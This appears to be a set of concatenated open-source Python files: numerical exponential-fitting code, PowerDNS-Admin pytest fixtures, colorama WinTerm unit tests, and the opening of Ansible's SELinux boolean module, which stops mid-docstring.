            y_f_part = self.sumFExp(s, a[inds], c[inds])
            pl.figure('reduceNumExp problem')
            pl.plot(s.imag, y_f_full.real, 'r')
            pl.plot(s.imag, y_f_part.real, 'b')
            pl.plot(s.imag, y_f_full.imag, 'r--')
            pl.plot(s.imag, y_f_part.imag, 'b--')
            pl.show()
        # multiple step approach
        t = np.linspace(0., 5./amin.real, 1000.)
        y_t = EF.sumExp(t, -a[inds], c[inds])
        y_t_full = EF.sumExp(t, -a, c)
        # surface under the to-be-grouped part of the time-domain kernel
        A_t = -np.sum(c[inds] * (np.exp(-a[inds]*t[-1]) - np.exp(-a[inds]*t[0])) / a[inds])
        y_t_lim = EF.sumExp(np.array([lim*1e-3]), -a[inds], c[inds])
        y_t_lim_full = EF.sumExp(np.array([lim*1e-3]), -a, c)
        #~ print 'full sum at 1ms: ', y_t_lim_full
        #~ print 'partial sum at 1ms: ', y_t_lim
        #~ print 'max full sum: ', np.max(y_t_full[1:])
        # fit first outside of first timestep if necessary (i.e. when the
        # grouped terms still contribute noticeably past t = lim)
        if amin.real < (2e4 / lim) and np.abs(y_t_lim_full - y_t_lim) > 0.001 * np.max(y_t_full[1:]):
            t_out = np.linspace(lim*1e-3, 5./amin.real, 1000.)
            y_out = EF.sumExp(t_out, -a[inds], c[inds])
            A_out = -np.sum(c[inds] * (np.exp(-a[inds]*t_out[-1]) - np.exp(-a[inds]*t_out[0])) / a[inds])
            try:
                # if the maximum of the to be grouped exponentials is past lim,
                # we use two exponentials, otherwise one
                #~ else:
                A, C, _ = EF.fitExp(t_out, y_out, deg=1, rtol=0.0001, surface=True, A=A_out)
                A = -A.real; C = C.real
                Ptemp = [False]
            except ValueError:
                # fall back on the slowest grouped timescale with the
                # magnitude chosen to conserve the outside surface
                A = np.array([amin.real])
                C = A_out / ((np.exp(-A*t_out[-1]) - np.exp(-A*t_out[0])) / A)
                Ptemp = [False]
            # check if we need to fit inside first timestep
            t_in = np.linspace(0., lim*1e-3, 100)
            y_in = EF.sumExp(t_in, -a[inds], c[inds]) - EF.sumExp(t_in, -A, C)
            A_in_full = -np.sum(c[inds] * (np.exp(-a[inds]*t_in[-1]) - np.exp(-a[inds]*t_in[0])) / a[inds])
            A_in = -np.sum(C * (np.exp(-A*t_in[-1]) - np.exp(-A*t_in[0])) / A)
            if np.abs(A_in - A_in_full) < 0.01 * np.abs(A_in_full):
                # we don't need to fit an extra exponential,
                # but just rescale surfaces a bit
                A_tot = np.sum(c[inds] / a[inds])
                A_part = np.sum(C / A)
                C = C * A_tot / A_part
                P = np.array(Ptemp, dtype=bool)
            else:
                # we need to fit an extra exponential inside the first
                # timestep, chosen so the total surface is conserved
                t = np.linspace(0., 3./amin.real, 1000.)
                A_t = np.sum(c[inds] / a[inds])
                A_exp1 = np.sum(C / A)
                A2 = np.array([1e4 / lim], dtype=complex)
                C2 = (A_t-A_exp1) * A2
                P = np.array(Ptemp + [False], dtype=bool)
                A = np.concatenate((A, A2))
                C = np.concatenate((C, C2))
        else:
            # we can just fit inside the first timestep
            # construct new exponential naively (conserves the surface)
            A = np.array([amin.real], dtype=complex)
            C = np.sum(c[inds] / a[inds]) * A
            P = np.array([False], dtype=bool)
        # concatenate the arrays
        anew = np.concatenate((anew, A))
        cnew = np.concatenate((cnew, C))
        pairsnew = np.concatenate((pairsnew, P))
        if pprint or pplot:
            # consistency check: the kernel surface should be conserved
            t = np.linspace(0.,0.050,100000)
            A_original = - np.sum(c * (np.exp(-a*t[-1]) - np.exp(-a*t[0])) / a)
            A_new = - np.sum(cnew * (np.exp(-anew*t[-1]) - np.exp(-anew*t[0])) / anew)
            if np.abs(A_original - A_new) > 1e-12 or np.isnan(A_new.real):
                print '!!! Warning: surfaces under kernels not equal !!!'
                print 'oringal surface: ', A_original
                print 'new surface: ', A_new
                print 'all a\'s: ', a
                print 'all gamma\'s: ', c
                print 'all pairs: ', pairs
                print 'tbg a\'s: ', a[inds]
                print 'tbg gamma\'s: ', c[inds]
                print 'tbg pairs: ', pairs[inds]
                print 'ntbg a\'s: ', a[inds_no]
                print 'ntbg gamma\'s: ', c[inds_no]
                print 'ntbg pairs: ', pairs[inds_no]
                print 'new a\'s: ', anew
                print 'new c\'s: ', cnew
                print 'new pairss: ', pairsnew
            if pplot and (np.abs(A_original - A_new) > 1e-12 or np.isnan(A_new.real)):
                #~ if pplot:
                t = np.linspace(0.,0.050,100000)
                dt = t[1] - t[0]
                ef = ExpFitter()
                se_ = ef.sumExp(t, -a[inds], c[inds])
                e_ = ef.sumExp(t, -A, C)
                se = ef.sumExp(t, -a, c)
                e = ef.sumExp(t, -anew, cnew)
                print 'integral original reduced: ', - np.sum(c[inds] * (np.exp(-a[inds]*t[-1]) - np.exp(-a[inds]*t[0])) / a[inds])
                print 'integral fit reduced: ', - np.sum(C * (np.exp(-A*t[-1]) - np.exp(-A*t[0])) / A)
                print 'final a\'s :', anew
                print 'new a\'s :', A
                import matplotlib.pyplot as pl
                pl.figure('reduce_exp problem')
                pl.plot(t*1000, se, 'r', label='original kernel')
                pl.plot(t*1000, e, 'b', label='new kernel')
                pl.plot(t*1000, se_, 'r--', label='exps to be reduced')
                pl.plot(t*1000, e_, 'b--', label='to be reduced exp')
                pl.legend(loc=0)
                pl.show()
    # new approximation and rmse
    approx = self.sumFExp(s, anew, cnew)
    rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
    return anew, cnew, rms, approx, pairsnew
def fitFExp_increment(self, s, y, rtol=1e-2, maxiter=20, maxiter_step=3, realpoles=True, constrained=True, zerostart=False, pprint=True):
    '''
    Fit by incrementing the number of exponentials: start from one pole and
    add a random pole (or conjugate pair) after each failed round, until
    [rtol] is reached or [maxiter] rounds have been performed.

    input:
        [s], [y]: complex numpy arrays, frequencies and function values
        [rtol]: float, relative tolerance at which to stop
        [maxiter]: int, maximal number of degree increments
        [maxiter_step]: int, pole-relocation iterations per round
        [realpoles]: boolean, add real poles if True, conjugate pairs if False
        [constrained], [zerostart]: passed through to _run_fit
        [pprint]: boolean, warn when the target accuracy is not reached
    output:
        [alpha], [gamma], [pairs], [rmsfinal]: best fit found
    '''
    # find the start nodes
    trialpoles, pairs = self._find_start_nodes(s, 1, realpoles, 'log10')
    for k in range(maxiter):
        alist, clist, rmslist, pairslist \
                = self._run_fit(s, copy.copy(y), trialpoles, pairs, rtol, maxiter_step,
                                constrained, zerostart, pole_flip=True, pprint=pprint)
        # keep the best iteration of this round
        indmin = np.argmin(np.array(rmslist))
        alpha = alist[indmin]; gamma = clist[indmin]; rms = rmslist[indmin]; pairs = pairslist[indmin]
        if rms < rtol:
            break
        else:
            # add one random pole (or one random conjugate pair) and retry
            if realpoles:
                alphanew = [s[-1].imag * np.random.rand()]
                pairsnew = [False]
            else:
                areal = s[-1].imag * np.random.rand()
                aimag = s[-1].imag * np.random.rand()
                alphanew = [areal + 1j*aimag, areal - 1j*aimag]
                pairsnew = [True, False]
            trialpoles = np.array(alpha.tolist() + alphanew)
            # print trialpoles
            pairs = np.array(pairs.tolist() + pairsnew)
    rmsfinal = rms
    if pprint and rmsfinal > rtol:
        print 'Target accuracy was not reached'
    return alpha, gamma, pairs, rmsfinal
def fitFExp(self, s, y, deg=20, rtol=1e-2, maxiter=5, lim=None, realpoles=True, initpoles='lin',
            zerostart=False, constrained=True, reduce_numexp=False):
    '''
    Fits a function in Fourier space by a series of Fourier-transformed exponentials.
    input:
        -args
        [s]: numpy array of frequencies (imaginary) at which value function is evaluated
        [y]: numpy array of complex function values
        -kwargs
        [deg]: int, number of exponential terms used (real number is doubled if realpoles=False)
        [rtol]: float, relative tolerance after which iterations stop
        [maxiter]: int, maximum number of iterations
        [lim]: float, smallest timescale to take into account [ms], if not None, the algorithm
            fits the slowest timescale first, then the next slowest, etc. !!Use only for
            decaying transfer functions!!
        [realpoles]: boolean, use real starting poles if true, use complex conjugate poles if
            false
        [initpoles]: 'lin' for linearly spaced initial poles, 'log10' and 'log' for
            logarithmically spaced poles
        [zerostart]: boolean, constrain the function to be 0 at t=0 if true
        [constrained]: fix the poles to be complex conjugate pairs
        [reduce_numexp]: boolean, pool short time scale exponentials together if true
    output:
        [alpha]: numpy array of (complex) timescales of exponentials
        [gamma]: numpy array of complex magnitudes of exponentials
        [pairs]: boolean array that indicates True at every index where a complex
            conjugate pair occurs
        [rms]: float, root mean square error
    '''
    trialpoles, pairs = self._find_start_nodes(s, deg, realpoles, initpoles)
    if lim != None:
        # peel off the slowest timescale one at a time (only valid for
        # decaying transfer functions, see docstring)
        a_s = []; c_s = []; pair_s = []
        y_decr = copy.copy(y)
        deg_decr = deg
        keep_going = True
        count = 0
        while keep_going:
            alist, clist, rmslist, pairslist = self._run_fit(s, y_decr, trialpoles, pairs, rtol, maxiter, constrained, zerostart)
            indmin = np.argmin(np.array(rmslist))
            anew, cnew, rmsnew, approx, pairsnew = self.reduceSeries(s, y_decr, alist[indmin], clist[indmin], pairs=pairslist[indmin], rtol=rtol)
            if count == 0:
                # save parameters for later purposes
                asave = copy.copy(anew)
                csave = copy.copy(cnew)
                rmssave = rmsnew
                pairssave = pairsnew
                surface_original = np.sum(cnew / anew)
            ind = []
            # take the longest timescale out (with its conjugate partner
            # when it is part of a pair)
            ind.append(np.argmin(anew.real))
            if pairsnew[ind]:
                ind.append(ind[0]+1)
            a_tba = anew[ind]
            c_tba = cnew[ind]
            pair_tba = pairsnew[ind]
            surface = np.sum(cnew / anew)
            y_old = copy.copy(y_decr)
            # subtract the extracted terms and refit the remainder next round
            y_decr = self.sumFExp(s, anew, cnew) - self.sumFExp(s, anew[ind], cnew[ind])
            #~ deg_decr -= len(ind)
            trialpoles, pairs = self._find_start_nodes(s, deg_decr, True, initpoles)
            # stop if timescale is small enough; choose the final residues
            # so that the total surface is conserved
            if anew[ind][0] > 1e3 / (0.2*lim):
                if len(ind) == 1:
                    c_tba = surface * a_tba
                elif len(ind) == 2:
                    c_tba[0] = surface * (a_tba[0].real**2 + a_tba[0].imag**2) / (2.*a_tba[0].real)
                    c_tba[1] = c_tba[0]
                else:
                    raise ValueError('invalid array length')
                keep_going = False
            # stop if rmse is small enough
            approx = self.sumFExp(s, a_tba, c_tba)
            rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
            if rms < rtol:
                keep_going = False
            # append new parameters to lists
            a_s += a_tba.tolist(); c_s += c_tba.tolist(); pair_s += pair_tba.tolist()
            # stop if to many parameters
            if count >= 9.:
                keep_going = False
            count +=1
        # for returning
        alpha = np.array(a_s, dtype=complex); gamma = np.array(c_s, dtype=complex); pairs = np.array(pair_s, dtype=bool)
        approx = self.sumFExp(s, alpha, gamma)
        rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
        # check whether it was better to go with the first parameters
        if len(asave) < len(alpha) and rmssave < rtol:
            alpha = asave; gamma = csave; pairs = pairssave
            approx = self.sumFExp(s, alpha, gamma)
            rms = np.sqrt(((np.abs(approx-y) / np.max(np.abs(y)))**2).sum() / len(y))
        # diagnostic: the surface under the kernel should be conserved
        surface_after = np.sum(gamma / alpha)
        if np.abs(surface_original - surface_after) > rtol * surface_original:
            print 'surface original: ', surface_original
            print 'surface after: ', surface_after
        if np.min(alpha.real) < 0.:
            print '!!!owowow!!!'
    else:
        # single global fit followed by a series reduction
        alist, clist, rmslist, pairslist = self._run_fit(s, y, trialpoles, pairs, rtol, maxiter, constrained, zerostart)
        indmin = np.argmin(np.array(rmslist))
        alpha, gamma, rms, approx, pairs = self.reduceSeries(s, y, alist[indmin], clist[indmin], pairs=pairslist[indmin], rtol=rtol)
        if reduce_numexp:
            alpha, gamma, rms, approx, pairs = self.reduceNumExp(s, y ,alpha, gamma, pairs, pplot=False)
    return alpha, gamma, pairs, rms
def fitFExp_vector(self, s, ys, deg=20, rtol=1e-2, maxiter=5, extra_startpoles=[], extra_startpoles_pairs=[],
                   realpoles=True, initpoles='lin', reduce_series=False):
    '''
    Fit multiple data-arrays in Fourier-domain simultaneously with a shared set of nodes
    input:
        [s]: numpy array of complex number, frequencies of data
        [ys]: numpy ndarray of complex numbers, rows are different data-arrays
        [deg]: int, the starting number of nodes
        [rtol]: float, the relative tolerance at which to stop
        [maxiter]: int, the maximal number of iterations after which to stop when rtol
            is not reached
        [extra_startpoles]: numpy array of complex number, additional initial poles
        [extra_startpoles_pairs]: numpy boolean array, indicates complex conjugate pairs
            associated with the extra initial poles
        [realpoles]: boolean, if True the starting poles are real, if false the starting
            poles are complex conjugates (and then the real degree is 2*deg)
        [initpoles]: string specifying how the initial poles are distributed, choices are
            'lin', 'log' and 'log10'
        [reduce_series]: boolean, whether to delete exponentials of small influence after
            the fitting
    output:
        [alpha]: complex numpy array of exponential coefficients
        [gamma]: 2d complex numpy array, each row contains the residues corresponding to
            the respective data arrays
        [pairs]: boolean numpy array, indicates where a pair of complex conjugate
            exponentials occurs
        [rms]: float, aggregated root mean square error
    '''
    # NOTE(review): mutable default arguments ([]) are shared across calls;
    # harmless while they are only read, but fragile
    trialpoles, pairs = self._find_start_nodes(s, deg, realpoles, initpoles)
    if len(extra_startpoles) > 0:
        trialpoles = np.concatenate((trialpoles, extra_startpoles))
        pairs = np.concatenate((pairs, extra_startpoles_pairs))
    alist, clist, rmslist, pairslist = self._run_fit_vector(s, ys, trialpoles, pairs, rtol, maxiter)
    indmin = np.argmin(np.array(rmslist))
    if reduce_series:
        # reduce the number of exponentials for each function separately
        alpha_arr = np.array([], dtype=complex)
        rms = 0.
        for ind, c in enumerate(clist[indmin]):
            alpha, gamma, rms_ind, approx, pair = self.reduceSeries(s, ys[ind], alist[indmin], c, pairs=pairslist[indmin], rtol=rtol)
            rms += rms_ind
            alpha_arr = np.concatenate((alpha_arr, alpha))
        # keep the union of the per-function surviving poles
        alpha_arr = np.unique(alpha_arr)
        # search positions of common alphas in the original pole array
        asortind = np.argsort(alist[indmin])
        alphapos = np.searchsorted(alist[indmin][asortind], alpha_arr)
        inds = asortind[alphapos]
        return alist[indmin][inds], clist[indmin][:,inds], pairslist[indmin][inds], rms
    else:
        return alist[indmin], clist[indmin], pairslist[indmin], rmslist[indmin]
| mit |
ngoduykhanh/PowerDNS-Admin | tests/fixtures.py | 1 | 8705 | import os
import pytest
import flask_migrate
from base64 import b64encode
from powerdnsadmin import create_app
from powerdnsadmin.models.base import db
from powerdnsadmin.models.user import User
from powerdnsadmin.models.setting import Setting
from powerdnsadmin.models.api_key import ApiKey
# Build the Flask application from the test configuration and push an
# application context so the fixtures below can access `app.config` and the
# database session at module import time.
app = create_app('../configs/test.py')
ctx = app.app_context()
ctx.push()
@pytest.fixture
def client():
    """Yield a Flask test client with TESTING mode enabled."""
    app.config['TESTING'] = True
    test_client = app.test_client()
    yield test_client
def load_data(setting_name, *args, **kwargs):
    """Return a canned Setting value for tests.

    Extra positional/keyword arguments are accepted (the real setter takes
    them) and ignored.  Unknown setting names yield None, matching the
    original fall-through behaviour.
    """
    canned_settings = {
        'maintenance': 0,
        'pdns_api_url': 'http://empty',
        'pdns_api_key': 'XXXX',
        'pdns_version': '4.1.0',
        'google_oauth_enabled': False,
        'session_timeout': 10,
        'allow_user_create_domain': True,
    }
    return canned_settings.get(setting_name)
@pytest.fixture
def test_admin_user():
    # Admin username as configured in configs/test.py.
    return app.config.get('TEST_ADMIN_USER')
@pytest.fixture
def test_user():
    # Ordinary (non-admin) username as configured in configs/test.py.
    return app.config.get('TEST_USER')
@pytest.fixture
def basic_auth_admin_headers():
    """Build an HTTP Basic-Auth header dict for the configured admin user."""
    username = app.config.get('TEST_ADMIN_USER')
    password = app.config.get('TEST_ADMIN_PASSWORD')
    credentials = "{0}:{1}".format(username, password)
    encoded = b64encode(credentials.encode('utf-8'))
    return {"Authorization": "Basic {0}".format(encoded.decode('utf-8'))}
@pytest.fixture
def basic_auth_user_headers():
    """Build an HTTP Basic-Auth header dict for the configured ordinary user."""
    username = app.config.get('TEST_USER')
    password = app.config.get('TEST_USER_PASSWORD')
    credentials = "{0}:{1}".format(username, password)
    encoded = b64encode(credentials.encode('utf-8'))
    return {"Authorization": "Basic {0}".format(encoded.decode('utf-8'))}
@pytest.fixture(scope="module")
def initial_data():
    """Seed the test database with PDNS settings and two local users.

    Reads the PowerDNS endpoint from PDNS_* environment variables, runs the
    schema migrations, then creates one admin and one ordinary user.  On
    teardown the session is closed and the on-disk test DB is removed.
    """
    pdns_proto = os.environ['PDNS_PROTO']
    pdns_host = os.environ['PDNS_HOST']
    pdns_port = os.environ['PDNS_PORT']
    pdns_api_url = '{0}://{1}:{2}'.format(pdns_proto, pdns_host, pdns_port)
    api_url_setting = Setting('pdns_api_url', pdns_api_url)
    api_key_setting = Setting('pdns_api_key', os.environ['PDNS_API_KEY'])
    allow_create_domain_setting = Setting('allow_user_create_domain', True)
    try:
        # Bring the schema up to date before inserting any rows.
        flask_migrate.upgrade()
        db.session.add(api_url_setting)
        db.session.add(api_key_setting)
        db.session.add(allow_create_domain_setting)
        test_user = app.config.get('TEST_USER')
        test_user_pass = app.config.get('TEST_USER_PASSWORD')
        test_admin_user = app.config.get('TEST_ADMIN_USER')
        test_admin_pass = app.config.get('TEST_ADMIN_PASSWORD')
        admin_user = User(username=test_admin_user,
                          plain_text_password=test_admin_pass,
                          email="admin@admin.com")
        # NOTE(review): raises when create_local_user() returns a falsy
        # result — presumably the failure case; confirm its return contract.
        msg = admin_user.create_local_user()
        if not msg:
            raise Exception("Error occurred creating user {0}".format(msg))
        ordinary_user = User(username=test_user,
                             plain_text_password=test_user_pass,
                             email="test@test.com")
        msg = ordinary_user.create_local_user()
        if not msg:
            raise Exception("Error occurred creating user {0}".format(msg))
    except Exception as e:
        print("Unexpected ERROR: {0}".format(e))
        raise e
    yield
    # Teardown: drop the session and delete the SQLite file used by tests.
    db.session.close()
    os.unlink(app.config['TEST_DB_LOCATION'])
@pytest.fixture(scope="module")
def initial_apikey_data():
    """Seed the test database with PDNS settings and two hashed API keys.

    Creates an Administrator-role and a User-role ApiKey whose hashes are
    derived from the plaintext keys in the test config.  Teardown removes
    the on-disk test DB.
    """
    pdns_proto = os.environ['PDNS_PROTO']
    pdns_host = os.environ['PDNS_HOST']
    pdns_port = os.environ['PDNS_PORT']
    pdns_api_url = '{0}://{1}:{2}'.format(pdns_proto, pdns_host, pdns_port)
    api_url_setting = Setting('pdns_api_url', pdns_api_url)
    api_key_setting = Setting('pdns_api_key', os.environ['PDNS_API_KEY'])
    allow_create_domain_setting = Setting('allow_user_create_domain', True)
    try:
        flask_migrate.upgrade()
        db.session.add(api_url_setting)
        db.session.add(api_key_setting)
        db.session.add(allow_create_domain_setting)
        test_user_apikey = app.config.get('TEST_USER_APIKEY')
        test_admin_apikey = app.config.get('TEST_ADMIN_APIKEY')
        # A throwaway ApiKey instance is used only for its hashing helper.
        dummy_apikey = ApiKey(desc="dummy", role_name="Administrator")
        admin_key = dummy_apikey.get_hashed_password(
            plain_text_password=test_admin_apikey).decode('utf-8')
        admin_apikey = ApiKey(key=admin_key,
                              desc="test admin apikey",
                              role_name="Administrator")
        admin_apikey.create()
        user_key = dummy_apikey.get_hashed_password(
            plain_text_password=test_user_apikey).decode('utf-8')
        user_apikey = ApiKey(key=user_key,
                             desc="test user apikey",
                             role_name="User")
        user_apikey.create()
    except Exception as e:
        print("Unexpected ERROR: {0}".format(e))
        raise e
    yield
    db.session.close()
    os.unlink(app.config['TEST_DB_LOCATION'])
@pytest.fixture
def zone_data():
    """Minimal zone payload for the zone-creation API tests."""
    return {
        "name": "example.org.",
        "kind": "NATIVE",
        "nameservers": ["ns1.example.org."],
    }
@pytest.fixture
def created_zone_data():
    """Canned PowerDNS API response for a freshly created example.org zone."""
    soa_content = ('a.misconfigured.powerdns.server. hostmaster.example.org. '
                   '2019013101 10800 3600 604800 3600')
    rrsets = [
        {
            'comments': [],
            'type': 'SOA',
            'name': 'example.org.',
            'ttl': 3600,
            'records': [{'content': soa_content, 'disabled': False}],
        },
        {
            'comments': [],
            'type': 'NS',
            'name': 'example.org.',
            'ttl': 3600,
            'records': [{'content': 'ns1.example.org.', 'disabled': False}],
        },
    ]
    return {
        'url': '/api/v1/servers/localhost/zones/example.org.',
        'soa_edit_api': 'DEFAULT',
        'last_check': 0,
        'masters': [],
        'dnssec': False,
        'notified_serial': 0,
        'nsec3narrow': False,
        'serial': 2019013101,
        'nsec3param': '',
        'soa_edit': '',
        'api_rectify': False,
        'kind': 'Native',
        'rrsets': rrsets,
        'name': 'example.org.',
        'account': '',
        'id': 'example.org.',
    }
def user_apikey_data():
    """Request payload for creating a User-role API key."""
    payload = {
        "description": "userkey",
        "domains": ["example.org"],
        "role": "User",
    }
    return payload
def admin_apikey_data():
    """Request payload for creating an Administrator-role API key."""
    return {
        "description": "masterkey",
        "domains": [],
        "role": "Administrator",
    }
@pytest.fixture(scope='module')
def user_apikey_integration():
    """X-API-KEY headers for the User-role key from the test config."""
    plain_user_key = app.config.get('TEST_USER_APIKEY')
    return create_apikey_headers(plain_user_key)
@pytest.fixture(scope='module')
def admin_apikey_integration():
    """X-API-KEY headers for the Administrator-role key from the test config."""
    plain_admin_key = app.config.get('TEST_ADMIN_APIKEY')
    return create_apikey_headers(plain_admin_key)
@pytest.fixture(scope='module')
def user_apikey():
    """X-API-KEY headers built from a freshly constructed User-role ApiKey."""
    data = user_apikey_data()
    # NOTE(review): the ApiKey is constructed but never persisted here;
    # presumably `plain_key` is generated in __init__ — confirm in the model.
    api_key = ApiKey(desc=data['description'],
                     role_name=data['role'],
                     domains=[])
    headers = create_apikey_headers(api_key.plain_key)
    return headers
@pytest.fixture(scope='module')
def admin_apikey():
    """X-API-KEY headers built from a freshly constructed Administrator ApiKey."""
    data = admin_apikey_data()
    # NOTE(review): as with user_apikey, the key is never saved to the DB;
    # confirm `plain_key` is populated by the constructor.
    api_key = ApiKey(desc=data['description'],
                     role_name=data['role'],
                     domains=[])
    headers = create_apikey_headers(api_key.plain_key)
    return headers
def create_apikey_headers(passw):
    """Wrap a plaintext API key as a base64-encoded X-API-KEY header dict."""
    encoded_key = b64encode(passw.encode('utf-8')).decode('utf-8')
    return {"X-API-KEY": encoded_key}
@pytest.fixture
def account_data():
    """Payload describing a test account for account-management tests."""
    return {
        "name": "test1",
        "description": "test1 account",
        "contact": "test1 contact",
        "mail": "test1@example.com",
    }
@pytest.fixture
def user1_data():
    """Payload describing an unconfirmed User-role account."""
    return {
        "username": "testuser1",
        "plain_text_password": "ChangeMePlease",
        "firstname": "firstname1",
        "lastname": "lastname1",
        "email": "testuser1@example.com",
        "otp_secret": "",
        "confirmed": False,
        "role_name": "User",
    }
| mit |
msabramo/colorama | colorama/tests/winterm_test.py | 3 | 3580 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from mock import Mock, patch
try:
from unittest2 import TestCase, main
except ImportError:
from unittest import TestCase, main
from ..winterm import WinColor, WinStyle, WinTerm
class WinTermTest(TestCase):
    """Unit tests for colorama's WinTerm with the win32 layer mocked out.

    Fix: the deprecated ``assertEquals`` alias (removed in Python 3.12) is
    replaced with ``assertEqual`` throughout; behaviour is otherwise
    unchanged.
    """

    @patch('colorama.winterm.win32')
    def testInit(self, mockWin32):
        # wAttributes packs: fore + back * 16 + style bits.
        mockAttr = Mock()
        mockAttr.wAttributes = 7 + 6 * 16 + 8
        mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
        term = WinTerm()
        self.assertEqual(term._fore, 7)
        self.assertEqual(term._back, 6)
        self.assertEqual(term._style, 8)

    def testGetAttrs(self):
        term = WinTerm()
        # get_attrs() must recombine the three components into one word.
        term._fore = 0
        term._back = 0
        term._style = 0
        self.assertEqual(term.get_attrs(), 0)
        term._fore = WinColor.YELLOW
        self.assertEqual(term.get_attrs(), WinColor.YELLOW)
        term._back = WinColor.MAGENTA
        self.assertEqual(
            term.get_attrs(),
            WinColor.YELLOW + WinColor.MAGENTA * 16)
        term._style = WinStyle.BRIGHT
        self.assertEqual(
            term.get_attrs(),
            WinColor.YELLOW + WinColor.MAGENTA * 16 + WinStyle.BRIGHT)

    @patch('colorama.winterm.win32')
    def testResetAll(self, mockWin32):
        # reset_all() should restore the attributes captured at init time.
        mockAttr = Mock()
        mockAttr.wAttributes = 1 + 2 * 16 + 8
        mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
        term = WinTerm()
        term.set_console = Mock()
        term._fore = -1
        term._back = -1
        term._style = -1
        term.reset_all()
        self.assertEqual(term._fore, 1)
        self.assertEqual(term._back, 2)
        self.assertEqual(term._style, 8)
        self.assertEqual(term.set_console.called, True)

    def testFore(self):
        term = WinTerm()
        term.set_console = Mock()
        term._fore = 0
        term.fore(5)
        self.assertEqual(term._fore, 5)
        self.assertEqual(term.set_console.called, True)

    def testBack(self):
        term = WinTerm()
        term.set_console = Mock()
        term._back = 0
        term.back(5)
        self.assertEqual(term._back, 5)
        self.assertEqual(term.set_console.called, True)

    def testStyle(self):
        term = WinTerm()
        term.set_console = Mock()
        term._style = 0
        term.style(22)
        self.assertEqual(term._style, 22)
        self.assertEqual(term.set_console.called, True)

    @patch('colorama.winterm.win32')
    def testSetConsole(self, mockWin32):
        mockAttr = Mock()
        mockAttr.wAttributes = 0
        mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
        term = WinTerm()
        term.windll = Mock()
        term.set_console()
        self.assertEqual(
            mockWin32.SetConsoleTextAttribute.call_args,
            ((mockWin32.STDOUT, term.get_attrs()), {})
        )

    @patch('colorama.winterm.win32')
    def testSetConsoleOnStderr(self, mockWin32):
        mockAttr = Mock()
        mockAttr.wAttributes = 0
        mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr
        term = WinTerm()
        term.windll = Mock()
        term.set_console(on_stderr=True)
        self.assertEqual(
            mockWin32.SetConsoleTextAttribute.call_args,
            ((mockWin32.STDERR, term.get_attrs()), {})
        )


if __name__ == '__main__':
    main()
| bsd-3-clause |
andmos/ansible | lib/ansible/modules/system/seboolean.py | 47 | 10825 | #!/usr/bin/python
# Copyright: (c) 2012, Stephen Fromm <sfromm@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: seboolean
short_description: Toggles SELinux booleans
description:
- Toggles SELinux booleans.
version_added: "0.7"
options:
name:
description:
- Name of the boolean to configure.
required: true
persistent:
description:
- Set to C(yes) if the boolean setting should survive a reboot.
type: bool
default: 'no'
state:
description:
- Desired boolean value
type: bool
required: true
ignore_selinux_state:
description:
- Useful for scenarios (chrooted environment) that you can't get the real SELinux state.
type: bool
default: false
version_added: '2.8'
notes:
- Not tested on any Debian based system.
requirements:
- libselinux-python
- libsemanage-python
author:
- Stephen Fromm (@sfromm)
'''
EXAMPLES = '''
- name: Set httpd_can_network_connect flag on and keep it persistent across reboots
seboolean:
name: httpd_can_network_connect
state: yes
persistent: yes
'''
import os
import traceback
SELINUX_IMP_ERR = None
try:
import selinux
HAVE_SELINUX = True
except ImportError:
SELINUX_IMP_ERR = traceback.format_exc()
HAVE_SELINUX = False
SEMANAGE_IMP_ERR = None
try:
import semanage
HAVE_SEMANAGE = True
except ImportError:
SEMANAGE_IMP_ERR = traceback.format_exc()
HAVE_SEMANAGE = False
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible.module_utils.six import binary_type
from ansible.module_utils._text import to_bytes, to_text
def get_runtime_status(ignore_selinux_state=False):
    """Report whether SELinux should be treated as enabled.

    The exact ``is True`` test is deliberate: only a literal True override
    skips the libselinux query (e.g. inside a chroot).
    """
    if ignore_selinux_state is True:
        return True
    return selinux.is_selinux_enabled()
def has_boolean_value(module, name):
    """Return True if `name` is among the SELinux booleans defined on this host."""
    bools = []
    try:
        rc, bools = selinux.security_get_boolean_names()
    except OSError:
        module.fail_json(msg="Failed to get list of boolean names")
    # Newer libselinux returns bytes instead of str, see
    # https://github.com/ansible/ansible/issues/25651
    if bools and isinstance(bools[0], binary_type):
        name = to_bytes(name)
    return name in bools
def get_boolean_value(module, name):
    """Return the current runtime value of SELinux boolean `name` as a bool."""
    state = 0
    try:
        state = selinux.security_get_boolean_active(name)
    except OSError:
        module.fail_json(msg="Failed to determine current state for boolean %s" % name)
    return state == 1
def semanage_get_handle(module):
    """Create and connect a semanage handle, or fail the module.

    Verifies the policy store is managed before connecting; the handle is
    destroyed on every failure path so nothing leaks.
    Fix: corrected the "whether policy is manage" error-message typo.
    """
    handle = semanage.semanage_handle_create()
    if not handle:
        module.fail_json(msg="Failed to create semanage library handle")
    managed = semanage.semanage_is_managed(handle)
    if managed <= 0:
        semanage.semanage_handle_destroy(handle)
        if managed < 0:
            module.fail_json(msg="Failed to determine whether policy is managed")
        if managed == 0:
            # Unmanaged store: give a root-specific hint, since re-running as
            # root cannot help in that case.
            if os.getuid() == 0:
                module.fail_json(msg="Cannot set persistent booleans without managed policy")
            else:
                module.fail_json(msg="Cannot set persistent booleans; please try as root")
    if semanage.semanage_connect(handle) < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to connect to semanage")
    return handle
def semanage_begin_transaction(module, handle):
    """Open a semanage transaction, destroying the handle and failing on error."""
    if semanage.semanage_begin_transaction(handle) < 0:
        semanage.semanage_handle_destroy(handle)
        module.fail_json(msg="Failed to begin semanage transaction")
def semanage_set_boolean_value(module, handle, name, value):
    """Set boolean `name` to `value` (0/1) in the persistent policy store.

    Follows the libsemanage C-API sequence: build a temporary bool record,
    extract its key, confirm the boolean exists, query the stored record,
